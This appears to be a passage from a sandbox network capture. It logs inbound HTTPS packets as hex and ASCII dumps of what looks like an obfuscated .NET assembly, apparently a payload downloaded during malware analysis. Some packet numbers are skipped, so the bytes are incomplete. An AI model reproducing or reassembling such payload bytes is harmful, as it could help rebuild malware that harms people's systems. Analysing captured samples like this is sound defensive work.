01 00 00 38 f5 ea ff ff 11 1d 11 58 1c 58 11 45 1c 91 9c 20 d7 00 00 00 Data Ascii: X! 8J(j 8 n JX; 8 ; 8 f QX_ 8m%(+ 8O0(oh 89v <Y 88 8]?(& 8XXE
2022-01-09 17:48:12 UTC	15	IN	Data Raw: 87 e6 ff ff 26 20 80 01 00 00 38 7c e6 ff ff 20 93 00 00 00 20 31 00 00 00 59 fe 0e 5f 00 20 1c 00 00 00 28 1f 01 00 06 3a 5e e6 ff ff 26 20 2a 02 00 00 38 53 e6 ff ff 11 20 28 ab 00 00 06 13 03 20 ea 00 00 00 28 1f 01 00 06 39 3b e6 ff ff 26 20 5e 00 00 00 38 30 e6 ff ff 11 3c 28 fa 00 00 06 20 c4 00 00 00 28 1e 01 00 06 3a 1a e6 ff ff 26 20 49 00 00 00 38 0f e6 ff ff fe 0c 76 00 20 0e 00 00 00 fe 0c 5f 00 9c 20 43 02 00 00 38 f7 e5 ff ff 11 43 1d 1f 74 9c 20 a7 00 00 00 38 e7 e5 ff ff 20 ab 00 00 00 20 39 00 00 00 59 fe 0e 5f 00 20 74 01 00 00 38 ce e5 ff ff 11 23 17 58 13 23 20 74 00 00 00 38 be e5 ff ff 11 73 1e 62 13 73 20 f9 00 00 00 38 ae e5 ff ff fe 0c 16 00 20 1f 00 00 00 20 6d 00 00 00 20 47 00 00 00 58 9c 20 c5 00 00 00 38 8f e5 ff ff 11 56 11 Data Ascii: & 8\| 1Y_ (:^& *8S ( (9;& ^80<( (:& I8v _ C8Ct 8 9Y_ t8#X# t8sbs 8 m GX 8V
2022-01-09 17:48:12 UTC	16	IN	Data Raw: 20 3e 00 00 00 59 9c 20 87 00 00 00 38 21 e1 ff ff 11 0b 8e 69 3a 52 31 00 00 20 23 02 00 00 38 0e e1 ff ff 11 1c 11 66 11 1c 11 66 91 11 54 11 66 91 61 d2 9c 20 33 02 00 00 38 f3 e0 ff ff fe 0c 16 00 20 13 00 00 00 fe 0c 3b 00 9c 20 03 02 00 00 38 db e0 ff ff 11 4c 3a cb 2b 00 00 20 e8 00 00 00 fe 0e 5a 00 38 c2 e0 ff ff fe 0c 16 00 20 10 00 00 00 20 e7 00 00 00 20 4d 00 00 00 59 9c 20 68 01 00 00 38 a7 e0 ff ff 11 38 1a 40 e3 fc ff ff 20 12 00 00 00 28 1f 01 00 06 3a 90 e0 ff ff 26 20 8d 00 00 00 38 85 e0 ff ff 11 65 28 e7 00 00 06 16 6a 28 e8 00 00 06 20 13 01 00 00 28 1f 01 00 06 39 68 e0 ff ff 26 20 1c 00 00 00 38 5d e0 ff ff fe 0c 16 00 20 01 00 00 00 fe 0c 3b 00 9c 20 ba 01 00 00 38 45 e0 ff ff 11 43 1f 0a 1f 6c 9c 20 78 01 00 00 38 34 e0 ff ff 20 Data Ascii: >Y 8!i:R1 #8ffTfa 38 ; 8L:+ Z8 MY h88@ (:& 8e(j( (9h& 8] ; 8ECl x84
2022-01-09 17:48:12 UTC	18	IN	Data Raw: ff 11 43 1e 1f 6c 9c 20 87 01 00 00 38 c8 db ff ff 11 28 16 3e ef 33 00 00 20 05 00 00 00 38 b6 db ff ff 7f 4f 00 00 04 28 6f 00 00 0a 28 17 01 00 06 13 14 20 5e 00 00 00 fe 0e 5a 00 38 93 db ff ff 11 35 25 13 0b 3a 6c fa ff ff 20 0a 01 00 00 38 83 db ff ff 1c 8d 16 00 00 01 13 22 20 b8 01 00 00 38 71 db ff ff 11 11 1a 1e 12 3f 28 b0 00 00 06 26 20 fc 00 00 00 38 5b db ff ff 20 b3 00 00 00 20 3b 00 00 00 59 fe 0e 3b 00 20 5d 01 00 00 28 1e 01 00 06 3a 3d db ff ff 26 20 47 00 00 00 38 32 db ff ff 20 ba 00 00 00 20 3e 00 00 00 59 fe 0e 3b 00 20 0f 00 00 00 38 19 db ff ff 11 43 1c 1f 2e 9c 20 15 02 00 00 38 09 db ff ff 11 5b 17 58 13 5b 20 09 00 00 00 28 1f 01 00 06 3a f4 da ff ff 26 20 05 01 00 00 38 e9 da ff ff 11 54 1f 09 11 4c 1a 91 9c 20 1b 01 00 00 38 Data Ascii: Cl 8(>3 8O(o( ^Z85%:l 8" 8q?(& 8[ ;Y; ](:=& G82 >Y; 8C. 8[X[ (:& 8TL 8
2022-01-09 17:48:12 UTC	19	IN	Data Raw: 00 20 0e 00 00 00 20 6e 00 00 00 20 05 00 00 00 58 9c 20 e7 00 00 00 fe 0e 5a 00 38 5c d6 ff ff 12 0a e0 73 72 00 00 0a 16 28 c6 00 00 06 26 20 39 02 00 00 38 47 d6 ff ff 11 0c 73 70 00 00 0a 11 59 28 1d 01 00 06 20 6d 01 00 00 38 2f d6 ff ff 20 48 00 00 00 20 2f 00 00 00 58 fe 0e 5f 00 20 14 00 00 00 28 1e 01 00 06 39 11 d6 ff ff 26 20 86 00 00 00 38 06 d6 ff ff fe 0c 16 00 20 01 00 00 00 fe 0c 3b 00 9c 20 3b 00 00 00 28 1e 01 00 06 39 e9 d5 ff ff 26 20 53 01 00 00 38 de d5 ff ff 7e 63 00 00 04 28 ef 00 00 06 16 9a 28 f0 00 00 06 13 30 20 94 00 00 00 38 c1 d5 ff ff fe 0c 16 00 20 01 00 00 00 fe 0c 3b 00 9c 20 42 02 00 00 fe 0e 5a 00 38 a1 d5 ff ff 12 0a e0 73 72 00 00 0a 16 28 c7 00 00 06 26 20 36 00 00 00 28 1f 01 00 06 3a 87 d5 ff ff 26 20 eb 01 00 00 Data Ascii: n X Z8\sr(& 98GspY( m8/ H /X_ (9& 8 ; ;(9& S8~c((0 8 ; BZ8sr(& 6(:&
2022-01-09 17:48:12 UTC	20	IN	Data Raw: 00 38 04 00 00 00 fe 0c 5e 00 45 02 00 00 00 58 01 00 00 05 00 00 00 38 53 01 00 00 00 38 43 00 00 00 20 02 00 00 00 fe 0e 2a 00 38 00 00 00 00 fe 0c 2a 00 45 06 00 00 00 05 00 00 00 72 00 00 00 55 00 00 00 8f 00 00 00 2a 00 00 00 14 00 00 00 38 00 00 00 00 38 85 00 00 00 20 05 00 00 00 38 cf ff ff ff 11 0d 28 e4 00 00 06 3a 35 00 00 00 20 03 00 00 00 38 b9 ff ff ff 12 30 28 6f 00 00 0a 7e 68 00 00 04 40 d9 ff ff ff 20 01 00 00 00 28 1e 01 00 06 3a 99 ff ff ff 26 20 01 00 00 00 38 8e ff ff ff 11 0d 28 d9 00 00 06 74 55 00 00 01 28 d0 00 00 06 13 30 20 04 00 00 00 38 71 ff ff ff 16 13 3e 20 00 00 00 00 28 1e 01 00 06 39 5f ff ff ff 26 20 00 00 00 00 38 54 ff ff ff dd 8a 00 00 00 11 0d 75 56 00 00 01 13 68 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 Data Ascii: 8^EX8S8C 8ErU*88 8(:5 80(o~h@ (:& 8(tU(0 8q> (9_& 8TuVh (:&
2022-01-09 17:48:12 UTC	22	IN	Data Raw: 00 00 58 fe 0e 5f 00 20 5c 00 00 00 38 bd cb ff ff fe 0c 16 00 20 1a 00 00 00 fe 0c 3b 00 9c 20 c8 00 00 00 38 a5 cb ff ff fe 0c 76 00 20 00 00 00 00 20 53 00 00 00 20 4e 00 00 00 58 9c 20 89 01 00 00 28 1f 01 00 06 39 81 cb ff ff 26 20 49 00 00 00 38 76 cb ff ff fe 0c 16 00 20 1b 00 00 00 20 6f 00 00 00 20 0e 00 00 00 58 9c 20 41 01 00 00 38 57 cb ff ff fe 0c 76 00 20 0b 00 00 00 fe 0c 5f 00 9c 20 f0 01 00 00 38 3f cb ff ff 00 11 25 73 70 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 74 2e 00 00 02 80 6d 00 00 04 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 62 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 4e f9 ff ff 26 20 01 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 4f Data Ascii: X_ \8 ; 8v S NX (9& I8v o X A8Wv _ 8?%sp.((t.m (:& 8bE8N& (:& 8O
2022-01-09 17:48:12 UTC	23	IN	Data Raw: db ff ff 20 0c 00 00 00 28 1f 01 00 06 3a 63 c6 ff ff 26 20 20 00 00 00 38 58 c6 ff ff fe 0c 16 00 20 04 00 00 00 20 7a 00 00 00 20 67 00 00 00 59 9c 20 c9 01 00 00 38 39 c6 ff ff 20 d5 00 00 00 20 47 00 00 00 59 fe 0e 3b 00 20 1d 01 00 00 38 20 c6 ff ff fe 0c 16 00 20 06 00 00 00 fe 0c 3b 00 9c 20 71 00 00 00 38 08 c6 ff ff 7f 4f 00 00 04 28 71 00 00 0a 28 fe 00 00 06 13 14 20 83 01 00 00 28 1f 01 00 06 3a e8 c5 ff ff 26 20 27 02 00 00 38 dd c5 ff ff 11 1d 11 58 18 58 11 45 18 91 9c 20 77 02 00 00 38 c8 c5 ff ff 11 1d 11 04 11 21 16 91 9c 20 66 02 00 00 38 b5 c5 ff ff 11 6c 11 2e 18 58 11 50 20 00 00 ff 00 5f 1f 10 64 d2 9c 20 7c 01 00 00 38 98 c5 ff ff fe 0c 16 00 20 12 00 00 00 fe 0c 3b 00 9c 20 37 01 00 00 fe 0e 5a 00 38 78 c5 ff ff 11 6c 11 2e 19 58 Data Ascii: (:c& 8X z gY 89 GY; 8 ; q8O(q( (:& '8XXE w8! f8l.XP _d \|8 ; 7Z8xl.X
2022-01-09 17:48:12 UTC	24	IN	Data Raw: 00 00 28 1e 01 00 06 3a af ff ff ff 26 20 02 00 00 00 38 a4 ff ff ff 38 1a 00 00 00 20 03 00 00 00 28 1e 01 00 06 39 90 ff ff ff 26 20 03 00 00 00 38 85 ff ff ff dc 20 8a 00 00 00 28 1f 01 00 06 39 d6 c0 ff ff 26 20 27 00 00 00 38 cb c0 ff ff 16 13 66 20 17 01 00 00 28 1f 01 00 06 3a b9 c0 ff ff 26 20 e5 01 00 00 38 ae c0 ff ff 18 13 58 20 8d 01 00 00 28 1f 01 00 06 3a 9c c0 ff ff 26 20 be 01 00 00 38 91 c0 ff ff fe 0c 16 00 20 11 00 00 00 20 cf 00 00 00 20 45 00 00 00 59 9c 20 5a 00 00 00 28 1f 01 00 06 3a 6d c0 ff ff 26 20 4f 01 00 00 38 62 c0 ff ff 11 65 28 f3 00 00 06 13 6b 20 2b 00 00 00 38 4f c0 ff ff 28 d4 00 00 06 1a 40 c1 cd ff ff 20 6b 02 00 00 38 3a c0 ff ff 2a d0 29 00 00 02 28 03 01 00 06 6f 24 00 00 0a 28 f1 00 00 06 28 f2 00 00 06 16 3e ba Data Ascii: (:& 88 (9& 8 (9& '8f (:& 8X (:& 8 EY Z(:m& O8be(k +8O(@ k8:*)(o$((>
2022-01-09 17:48:12 UTC	26	IN	Data Raw: ff 26 20 db 01 00 00 38 b7 bb ff ff 20 1a 00 00 00 20 14 00 00 00 58 fe 0e 3b 00 20 ca 01 00 00 38 9e bb ff ff 11 22 1a 1f 69 9c 20 a2 00 00 00 28 1f 01 00 06 3a 89 bb ff ff 26 20 aa 00 00 00 38 7e bb ff ff fe 0c 16 00 20 12 00 00 00 fe 0c 3b 00 9c 20 4f 00 00 00 28 1f 01 00 06 3a 61 bb ff ff 26 20 a0 00 00 00 38 56 bb ff ff fe 0c 76 00 20 0b 00 00 00 20 05 00 00 00 20 6e 00 00 00 58 9c 20 43 00 00 00 38 37 bb ff ff 16 80 5e 00 00 04 20 8f 01 00 00 38 27 bb ff ff 38 01 d7 ff ff 20 b4 00 00 00 38 18 bb ff ff 20 c3 00 00 00 20 41 00 00 00 59 fe 0e 3b 00 20 62 02 00 00 38 ff ba ff ff 20 20 00 00 00 20 62 00 00 00 58 fe 0e 5f 00 20 d9 01 00 00 28 1e 01 00 06 3a e1 ba ff ff 26 20 68 01 00 00 38 d6 ba ff ff fe 0c 16 00 20 1f 00 00 00 20 ce 00 00 00 20 44 00 00 Data Ascii: & 8 X; 8"i (:& 8~ ; O(:a& 8Vv nX C87^ 8'8 8 AY; b8 bX_ (:& h8 D
2022-01-09 17:48:12 UTC	27	IN	Data Raw: 20 77 00 00 00 20 2b 00 00 00 58 9c 20 77 01 00 00 38 54 b6 ff ff fe 0c 16 00 20 1c 00 00 00 20 26 00 00 00 20 6e 00 00 00 58 9c 20 d5 01 00 00 38 35 b6 ff ff 20 c9 00 00 00 20 43 00 00 00 59 fe 0e 3b 00 20 09 01 00 00 fe 0e 5a 00 38 14 b6 ff ff fe 0c 16 00 20 03 00 00 00 20 97 00 00 00 20 32 00 00 00 59 9c 20 75 00 00 00 28 1e 01 00 06 3a f4 b5 ff ff 26 20 10 00 00 00 38 e9 b5 ff ff 20 bf 00 00 00 20 3f 00 00 00 59 fe 0e 3b 00 20 18 01 00 00 28 1e 01 00 06 3a cb b5 ff ff 26 20 29 00 00 00 38 c0 b5 ff ff fe 0c 76 00 20 08 00 00 00 fe 0c 5f 00 9c 20 af 00 00 00 28 1e 01 00 06 3a a3 b5 ff ff 26 20 42 00 00 00 38 98 b5 ff ff 1f 28 8d 16 00 00 01 25 d0 02 01 00 04 28 1b 01 00 06 13 2b 20 68 00 00 00 28 1e 01 00 06 3a 75 b5 ff ff 26 20 2f 00 00 00 38 6a b5 ff Data Ascii: w +X w8T & nX 85 CY; Z8 2Y u(:& 8 ?Y; (:& )8v _ (:& B8(%(+ h(:u& /8j
2022-01-09 17:48:12 UTC	28	IN	Data Raw: 00 00 00 38 09 b1 ff ff fe 0c 76 00 20 08 00 00 00 20 02 00 00 00 20 34 00 00 00 58 9c 20 eb 00 00 00 38 ea b0 ff ff fe 0c 16 00 20 16 00 00 00 20 59 00 00 00 20 5a 00 00 00 58 9c 20 05 02 00 00 38 cb b0 ff ff fe 0c 16 00 20 0a 00 00 00 fe 0c 3b 00 9c 20 c3 01 00 00 38 b3 b0 ff ff 11 43 17 1f 73 9c 20 08 01 00 00 28 1f 01 00 06 39 9e b0 ff ff 26 20 ab 00 00 00 38 93 b0 ff ff 11 43 1e 1f 2e 9c 20 12 02 00 00 38 83 b0 ff ff 20 6d 00 00 00 20 6d 00 00 00 58 fe 0e 3b 00 20 52 00 00 00 38 6a b0 ff ff 7e 61 00 00 04 28 18 01 00 06 20 c1 01 00 00 38 56 b0 ff ff fe 0c 76 00 20 01 00 00 00 20 93 00 00 00 20 61 00 00 00 58 9c 20 00 01 00 00 28 1e 01 00 06 39 32 b0 ff ff 26 20 19 01 00 00 38 27 b0 ff ff 38 ec c8 ff ff 20 5b 00 00 00 38 18 b0 ff ff 20 82 00 00 00 20 Data Ascii: 8v 4X 8 Y ZX 8 ; 8Cs (9& 8C. 8 m mX; R8j~a( 8Vv aX (92& 8'8 [8
2022-01-09 17:48:12 UTC	30	IN	Data Raw: 00 00 00 28 1f 01 00 06 3a 2a ff ff ff 26 20 0b 00 00 00 38 1f ff ff ff 11 5c a5 13 00 00 01 80 4f 00 00 04 20 00 00 00 00 28 1f 01 00 06 3a 04 ff ff ff 26 20 00 00 00 00 38 f9 fe ff ff 11 61 16 6a 28 e8 00 00 06 20 06 00 00 00 28 1f 01 00 06 3a e1 fe ff ff 26 20 12 00 00 00 38 d6 fe ff ff 73 73 00 00 0a 13 61 20 06 00 00 00 38 c5 fe ff ff 11 61 7f 4f 00 00 04 28 6f 00 00 0a 28 17 01 00 06 16 1e 28 f7 00 00 06 20 0e 00 00 00 28 1e 01 00 06 3a 9e fe ff ff 26 20 09 00 00 00 38 93 fe ff ff 38 b8 ff ff ff 20 08 00 00 00 38 84 fe ff ff 11 61 28 fa 00 00 06 20 0e 00 00 00 28 1f 01 00 06 3a 6e fe ff ff 26 20 11 00 00 00 38 63 fe ff ff 11 61 28 d4 00 00 06 8d 16 00 00 01 16 28 d4 00 00 06 28 f7 00 00 06 20 05 00 00 00 fe 0e 64 00 38 3a fe ff ff 16 13 07 20 01 00 Data Ascii: (:*& 8\O (:& 8aj( (:& 8ssa 8aO(o(( (:& 88 8a( (:n& 8ca((( d8:
2022-01-09 17:48:12 UTC	31	IN	Data Raw: 38 ef f2 ff ff 20 6f 00 00 00 38 50 a6 ff ff 12 0a e0 73 72 00 00 0a 16 7e 0a 00 00 0a 28 c8 00 00 06 20 7f 01 00 00 fe 0e 5a 00 38 2b a6 ff ff 11 0c 73 70 00 00 0a 28 d4 00 00 06 1f 40 12 4e 28 b0 00 00 06 26 20 c6 01 00 00 38 0f a6 ff ff 12 69 fe 15 30 00 00 02 20 16 01 00 00 38 fd a5 ff ff fe 0c 16 00 20 11 00 00 00 20 2f 00 00 00 20 42 00 00 00 58 9c 20 c4 01 00 00 28 1f 01 00 06 39 d9 a5 ff ff 26 20 f6 00 00 00 38 ce a5 ff ff 11 4b 8e 69 1a 5d 13 28 20 55 00 00 00 28 1e 01 00 06 3a b7 a5 ff ff 26 20 04 00 00 00 38 ac a5 ff ff 11 25 28 04 01 00 06 28 fe 00 00 06 13 45 20 73 02 00 00 38 94 a5 ff ff fe 0c 16 00 20 02 00 00 00 fe 0c 3b 00 9c 20 04 02 00 00 38 7c a5 ff ff 20 02 00 00 00 20 32 00 00 00 58 fe 0e 3b 00 20 bf 00 00 00 28 1f 01 00 06 3a 5e a5 Data Ascii: 8 o8Psr~( Z8+sp(@N(& 8i0 8 / BX (9& 8Ki]( U(:& 8%((E s8 ; 8\| 2X; (:^
2022-01-09 17:48:12 UTC	32	IN	Data Raw: f2 a1 ff ff fe 0c 76 00 20 0c 00 00 00 20 80 00 00 00 20 2a 00 00 00 59 9c 20 ea 01 00 00 38 d3 a1 ff ff fe 0c 16 00 20 12 00 00 00 20 d0 00 00 00 20 45 00 00 00 59 9c 20 5f 00 00 00 fe 0e 5a 00 38 ac a1 ff ff fe 0c 16 00 20 18 00 00 00 fe 0c 3b 00 9c 20 2c 02 00 00 28 1e 01 00 06 3a 93 a1 ff ff 26 20 29 01 00 00 38 88 a1 ff ff 20 20 00 00 00 8d 16 00 00 01 fe 0e 16 00 20 0a 00 00 00 28 1e 01 00 06 39 6b a1 ff ff 26 20 81 00 00 00 38 60 a1 ff ff fe 0c 76 00 20 05 00 00 00 fe 0c 5f 00 9c 20 38 01 00 00 fe 0e 5a 00 38 40 a1 ff ff fe 0c 16 00 20 1b 00 00 00 fe 0c 3b 00 9c 20 22 02 00 00 28 1e 01 00 06 3a 27 a1 ff ff 26 20 b2 01 00 00 38 1c a1 ff ff 11 65 28 f3 00 00 06 13 06 20 33 00 00 00 38 09 a1 ff ff 20 8d 00 00 00 20 2f 00 00 00 59 fe 0e 3b 00 20 42 00 Data Ascii: v *Y 8 EY _Z8 ; ,(:& )8 (9k& 8`v _ 8Z8@ ; "(:'& 8e( 38 /Y; B
2022-01-09 17:48:12 UTC	33	IN	Data Raw: 38 98 9c ff ff 11 1d 11 58 19 58 11 45 19 91 9c 20 bd 01 00 00 28 1f 01 00 06 39 7e 9c ff ff 26 20 31 00 00 00 38 73 9c ff ff fe 0c 16 00 20 03 00 00 00 20 96 00 00 00 20 32 00 00 00 59 9c 20 60 01 00 00 38 54 9c ff ff 14 13 45 20 98 00 00 00 38 47 9c ff ff 1f 0c 8d 16 00 00 01 13 43 20 0b 00 00 00 28 1f 01 00 06 3a 2f 9c ff ff 26 20 31 01 00 00 38 24 9c ff ff 7e 61 00 00 04 28 0c 01 00 06 13 4d 20 49 01 00 00 38 0e 9c ff ff 20 55 00 00 00 20 77 00 00 00 58 fe 0e 3b 00 20 51 00 00 00 28 1e 01 00 06 3a f0 9b ff ff 26 20 11 00 00 00 38 e5 9b ff ff fe 0c 16 00 20 11 00 00 00 fe 0c 3b 00 9c 20 04 00 00 00 28 1e 01 00 06 39 c8 9b ff ff 26 20 99 00 00 00 38 bd 9b ff ff 11 56 11 56 20 fb 34 32 48 fe 0e 09 00 20 5b 25 86 6b fe 0e 71 00 fe 0e 51 00 20 ab 1a 07 04 Data Ascii: 8XXE (9~& 18s 2Y `8TE 8GC (:/& 18$~a(M I8 U wX; Q(:& 8 ; (9& 8VV 42H [%kqQ
2022-01-09 17:48:12 UTC	35	IN	Data Raw: 00 00 7e 66 00 00 04 3a 41 00 00 00 28 b3 00 00 06 72 b0 0d 00 70 28 62 00 00 0a 72 be 0d 00 70 28 62 00 00 0a 72 d0 0d 00 70 28 82 00 00 0a 28 ac 00 00 06 d0 34 00 00 02 28 23 00 00 0a 28 81 00 00 0a 74 34 00 00 02 80 66 00 00 04 7e 66 00 00 04 02 03 04 05 0e 04 6f 4a 01 00 06 2a 13 30 06 00 50 00 00 00 00 00 00 00 7e 5c 00 00 04 3a 37 00 00 00 28 b3 00 00 06 72 92 0d 00 70 28 62 00 00 0a 72 de 0d 00 70 28 80 00 00 0a 28 ac 00 00 06 d0 35 00 00 02 28 23 00 00 0a 28 81 00 00 0a 74 35 00 00 02 80 5c 00 00 04 7e 5c 00 00 04 02 03 04 05 6f 4f 01 00 06 2a 13 30 05 00 4f 00 00 00 00 00 00 00 7e 5b 00 00 04 3a 37 00 00 00 28 b3 00 00 06 72 ee 0d 00 70 28 62 00 00 0a 72 fa 0d 00 70 28 80 00 00 0a 28 ac 00 00 06 d0 36 00 00 02 28 23 00 00 0a 28 81 00 00 0a 74 36 Data Ascii: ~f:A(rp(brp(brp((4(#(t4f~foJ0P~\:7(rp(brp((5(#(t5\~\oO0O~[:7(rp(brp((6(#(t6
2022-01-09 17:48:12 UTC	36	IN	Data Raw: 2a 2e 00 fe 09 00 00 28 69 00 00 0a 2a 5e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 28 6a 00 00 0a 2a 1e 00 28 a7 00 00 06 2a 1e 00 28 92 00 00 0a 2a 2a fe 09 00 00 6f 93 00 00 0a 2a 00 2a fe 09 00 00 6f 94 00 00 0a 2a 00 4e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 28 ad 00 00 06 2a 3e 00 fe 09 00 00 fe 09 01 00 28 95 00 00 0a 2a 1e 00 28 5d 01 00 06 2a 1e 00 28 65 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 96 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 97 00 00 0a 2a 2a fe 09 00 00 6f 98 00 00 0a 2a 00 2a fe 09 00 00 6f 99 00 00 0a 2a 00 2a fe 09 00 00 6f 9a 00 00 0a 2a 00 2a fe 09 00 00 6f 9b 00 00 0a 2a 00 2a fe 09 00 00 6f 9c 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 8d 00 00 0a 2a 2a fe 09 00 00 6f 9d 00 00 0a 2a 00 2a fe 09 00 00 6f Data Ascii: .(i^(j((ooN(>((](e>(>(oooo*o>(oo
2022-01-09 17:48:12 UTC	37	IN	Data Raw: 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 0a 00 2a 00 1e 02 28 09 00 00 0a 2a 1b 30 06 00 88 39 00 00 1a 00 00 11 20 76 00 00 00 fe 0e 19 00 38 00 00 00 00 fe 0c 19 00 45 90 01 00 00 ee 2b 00 00 83 28 00 00 45 27 00 00 34 02 00 00 e1 02 00 00 dc 08 00 00 55 28 00 00 f2 2c 00 00 82 00 00 00 03 22 00 00 3a 0f 00 00 5f 0e 00 00 63 0b 00 00 89 22 00 00 b4 28 00 00 88 30 00 00 32 05 00 00 43 1c 00 00 9f 0d 00 00 95 24 00 00 af 18 00 00 67 2a 00 00 73 1d 00 00 cb 10 00 00 61 22 00 00 24 1d 00 00 2e 08 00 00 28 10 00 00 e0 0c 00 00 10 01 00 00 39 0c 00 00 22 19 00 00 61 2e 00 00 14 1f 00 00 4a 05 00 00 87 21 00 00 16 0c 00 00 e3 1a 00 00 80 2a 00 00 8f 07 00 00 de 22 00 00 e5 27 00 00 97 25 00 00 a7 15 00 00 c6 2b 00 00 Data Ascii: ((((09 v8E+(E'4U(,":_c"(02C$gsa"$.(9"a.J!"'%+
2022-01-09 17:48:12 UTC	39	IN	Data Raw: 00 00 c7 11 00 00 26 18 00 00 db 01 00 00 4e 30 00 00 af 0f 00 00 1b 24 00 00 c3 1b 00 00 4e 16 00 00 f3 1a 00 00 dc 05 00 00 21 1e 00 00 08 06 00 00 c6 01 00 00 f5 1c 00 00 e5 07 00 00 1c 0a 00 00 3d 28 00 00 f6 0b 00 00 4d 09 00 00 1b 02 00 00 58 1b 00 00 aa 13 00 00 8c 1d 00 00 c9 21 00 00 d4 30 00 00 9a 2d 00 00 2b 30 00 00 da 03 00 00 16 29 00 00 b1 0c 00 00 88 2e 00 00 dd 19 00 00 4a 0d 00 00 d8 2d 00 00 82 13 00 00 6f 06 00 00 11 1c 00 00 11 2d 00 00 13 0b 00 00 85 0e 00 00 0d 07 00 00 36 26 00 00 f0 2a 00 00 5a 2b 00 00 f0 26 00 00 fd 22 00 00 e8 00 00 00 7d 08 00 00 56 10 00 00 c9 24 00 00 45 15 00 00 7f 16 00 00 03 31 00 00 af 10 00 00 01 2a 00 00 d8 2e 00 00 43 2d 00 00 b1 21 00 00 ef 11 00 00 02 1e 00 00 bf 00 00 00 22 25 00 00 09 0d 00 00 ba Data Ascii: &N0$N!=(MX!0-+0).J-o-6&Z+&"}V$E1.C-!"%
2022-01-09 17:48:12 UTC	40	IN	Data Raw: 90 00 00 00 20 30 00 00 00 59 fe 0e 1e 00 20 0d 00 00 00 28 73 01 00 06 3a 77 f5 ff ff 26 20 20 00 00 00 38 6c f5 ff ff 20 a0 00 00 00 20 4f 00 00 00 58 fe 0e 1e 00 20 4a 00 00 00 38 53 f5 ff ff fe 0c 0c 00 20 1d 00 00 00 20 cf 00 00 00 20 45 00 00 00 59 9c 20 f0 00 00 00 38 34 f5 ff ff fe 0c 0c 00 20 1b 00 00 00 20 62 00 00 00 20 43 00 00 00 58 9c 20 5d 01 00 00 28 72 01 00 06 3a 10 f5 ff ff 26 20 27 00 00 00 38 05 f5 ff ff 20 22 00 00 00 20 47 00 00 00 58 fe 0e 1e 00 20 04 01 00 00 fe 0e 19 00 38 e4 f4 ff ff fe 0c 0c 00 20 0b 00 00 00 fe 0c 1e 00 9c 20 e4 00 00 00 38 d0 f4 ff ff fe 0c 0c 00 20 0c 00 00 00 20 f7 00 00 00 20 52 00 00 00 59 9c 20 de 00 00 00 38 b1 f4 ff ff fe 0c 0c 00 20 11 00 00 00 fe 0c 1e 00 9c 20 87 00 00 00 28 73 01 00 06 3a 94 f4 ff Data Ascii: 0Y (s:w& 8l OX J8S EY 84 b CX ](r:& '8 " GX 8 8 RY 8 (s:
2022-01-09 17:48:12 UTC	41	IN	Data Raw: 74 00 00 00 20 7a 00 00 00 58 9c 20 52 00 00 00 28 73 01 00 06 3a 21 f0 ff ff 26 20 5c 00 00 00 38 16 f0 ff ff fe 0c 04 00 20 07 00 00 00 20 2c 00 00 00 20 13 00 00 00 58 9c 20 34 01 00 00 38 f7 ef ff ff fe 0c 04 00 20 00 00 00 00 20 ad 00 00 00 20 39 00 00 00 59 9c 20 16 00 00 00 38 d8 ef ff ff fe 0c 0c 00 20 12 00 00 00 fe 0c 1e 00 9c 20 6f 01 00 00 28 73 01 00 06 39 bb ef ff ff 26 20 0c 00 00 00 38 b0 ef ff ff 20 01 00 00 00 13 10 20 f5 00 00 00 38 9f ef ff ff fe 0c 0c 00 20 05 00 00 00 20 83 00 00 00 20 31 00 00 00 59 9c 20 99 00 00 00 38 80 ef ff ff fe 0c 0c 00 20 1e 00 00 00 20 3c 00 00 00 20 00 00 00 00 58 9c 20 d7 00 00 00 38 61 ef ff ff fe 0c 04 00 20 00 00 00 00 20 a1 00 00 00 20 59 00 00 00 58 9c 20 24 01 00 00 38 42 ef ff ff fe 0c 0c 00 20 13 Data Ascii: t zX R(s:!& \8 , X 48 9Y 8 o(s9& 8 8 1Y 8 < X 8a YX $8B
2022-01-09 17:48:12 UTC	43	IN	Data Raw: 11 16 11 03 8e 69 3f db 10 00 00 20 39 01 00 00 fe 0e 19 00 38 c5 ea ff ff 20 1d 00 00 00 20 2d 00 00 00 58 fe 0e 1e 00 20 52 00 00 00 28 72 01 00 06 3a ab ea ff ff 26 20 1a 00 00 00 38 a0 ea ff ff 38 17 10 00 00 20 2c 01 00 00 28 72 01 00 06 3a 8c ea ff ff 26 20 10 01 00 00 38 81 ea ff ff 20 8c 00 00 00 20 2e 00 00 00 59 fe 0e 11 00 20 3e 00 00 00 fe 0e 19 00 38 60 ea ff ff fe 0c 04 00 20 08 00 00 00 fe 0c 11 00 9c 20 84 01 00 00 38 4c ea ff ff fe 0c 0c 00 20 13 00 00 00 fe 0c 1e 00 9c 20 f8 00 00 00 28 72 01 00 06 39 2f ea ff ff 26 20 67 01 00 00 38 24 ea ff ff fe 0c 04 00 20 0d 00 00 00 fe 0c 11 00 9c 20 63 00 00 00 38 0c ea ff ff fe 0c 04 00 20 00 00 00 00 fe 0c 11 00 9c 20 28 00 00 00 28 73 01 00 06 3a ef e9 ff ff 26 20 e3 00 00 00 38 e4 e9 ff ff 20 Data Ascii: i? 98 -X R(r:& 88 ,(r:& 8 .Y >8` 8L (r9/& g8$ c8 ((s:& 8
